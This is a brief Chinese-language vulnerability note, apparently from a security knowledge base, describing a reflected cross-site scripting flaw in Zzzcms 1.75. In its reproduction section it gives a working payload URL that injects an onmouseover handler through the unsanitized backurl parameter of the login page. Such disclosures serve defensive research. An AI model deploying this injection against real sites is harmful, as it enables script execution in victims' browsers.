Zzzcms 1.75 xss漏洞

一、漏洞简介

二、漏洞影响

Zzzcms 1.75

三、复现过程

http://www.0-sec.org/plugins/template/login.php?backurl=1%20onmouseover%3dalert(9516)%20y%3d

该onmouseover事件在移动到登录注册时会触发

对传入的backurl并没有做任何防护

image